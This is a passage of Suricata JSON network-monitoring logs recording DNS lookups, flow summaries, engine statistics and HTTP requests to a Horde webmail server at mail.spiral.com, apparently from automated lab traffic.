{"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.000640+0000","flow_id":2096445098018283,"event_type":"flow","src_ip":"192.168.10.122","src_port":37955,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:23.902635+0000","end":"2020-02-28T23:59:24.013986+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:25.424689+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:25.434576+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10868,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.641290+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661}} 
{"timestamp":"2020-02-29T00:04:26.000170+0000","event_type":"stats","stats":{"uptime":13918,"capture":{"kernel_packets":133165,"kernel_drops":0},"decoder":{"pkts":133216,"bytes":92285631,"invalid":181,"ipv4":131779,"ipv6":8,"ethernet":133216,"raw":0,"null":0,"sll":0,"tcp":126720,"udp":4864,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2218,"failed_udp":108},"tx":{"http":4508,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2295}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2257,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23144,"memcap_state":0,"memcap_global":0},"http":{"memuse":205896,"memcap":0}}} 
{"timestamp":"2020-02-29T00:04:26.001199+0000","flow_id":1755149832342807,"event_type":"flow","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1481,"bytes_toclient":6174,"start":"2020-02-29T00:03:20.445719+0000","end":"2020-02-29T00:03:25.703240+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:28.151153+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} {"timestamp":"2020-02-29T00:04:29.486791+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18961,"tx_id":1}} {"timestamp":"2020-02-29T00:04:29.495288+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30120,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:29.722668+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170}} 
{"timestamp":"2020-02-29T00:04:32.103218+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:04:32.278299+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64802,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.455299+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} 
{"timestamp":"2020-02-29T00:04:33.000372+0000","event_type":"stats","stats":{"uptime":13925,"capture":{"kernel_packets":133240,"kernel_drops":0},"decoder":{"pkts":133250,"bytes":92298822,"invalid":181,"ipv4":131811,"ipv6":8,"ethernet":133250,"raw":0,"null":0,"sll":0,"tcp":126746,"udp":4870,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2220,"failed_udp":109},"tx":{"http":4510,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2297}},"flow_mgr":{"closed_pruned":2672,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":104482,"memcap":0}}} 
{"timestamp":"2020-02-29T00:04:34.727684+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21414,"tx_id":2}} {"timestamp":"2020-02-29T00:04:37.456381+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19290,"tx_id":1}} 
{"timestamp":"2020-02-29T00:04:38.001135+0000","flow_id":686372991301585,"event_type":"flow","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1393,"bytes_toclient":6242,"start":"2020-02-29T00:03:32.227281+0000","end":"2020-02-29T00:03:37.538580+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:40.000262+0000","event_type":"stats","stats":{"uptime":13932,"capture":{"kernel_packets":133273,"kernel_drops":0},"decoder":{"pkts":133276,"bytes":92306829,"invalid":181,"ipv4":131835,"ipv6":8,"ethernet":133276,"raw":0,"null":0,"sll":0,"tcp":126766,"udp":4874,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2694,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2710,"synack":2701,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1737,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2222,"failed_udp":109},"tx":{"http":4512,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2299}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypass
ed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":35710,"memcap":0}}} {"timestamp":"2020-02-29T00:04:40.321905+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27442,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:40.588219+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} 
{"timestamp":"2020-02-29T00:04:40.610884+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270}} {"timestamp":"2020-02-29T00:04:45.616045+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} 
{"timestamp":"2020-02-29T00:04:47.000164+0000","event_type":"stats","stats":{"uptime":13939,"capture":{"kernel_packets":133281,"kernel_drops":0},"decoder":{"pkts":133294,"bytes":92314686,"invalid":181,"ipv4":131853,"ipv6":8,"ethernet":133294,"raw":0,"null":0,"sll":0,"tcp":126782,"udp":4876,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2695,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2711,"synack":2702,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1738,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2223,"failed_udp":109},"tx":{"http":4513,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2300}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24468,"memcap_state":0,"memcap_global":0},"http":{"memuse":40042,"memcap":0}}} 
{"timestamp":"2020-02-29T00:04:48.000452+0000","flow_id":1881129799098872,"event_type":"flow","src_ip":"192.168.10.122","src_port":42778,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.369144+0000","end":"2020-02-28T23:59:47.734840+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000632+0000","flow_id":623224072413106,"event_type":"flow","src_ip":"192.168.10.122","src_port":37719,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.106418+0000","end":"2020-02-28T23:59:47.331703+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000678+0000","flow_id":2193489897440047,"event_type":"flow","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:02:47.377647+0000","end":"2020-02-29T00:03:47.408351+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:04:48.000945+0000","flow_id":240989174631820,"event_type":"flow","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":3514,"bytes_toclient":28564,"start":"2020-02-29T00:02:46.724364+0000","end":"2020-02-29T00:03:47.408388+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:50.047903+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32155,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:50.308555+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:04:50.329994+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 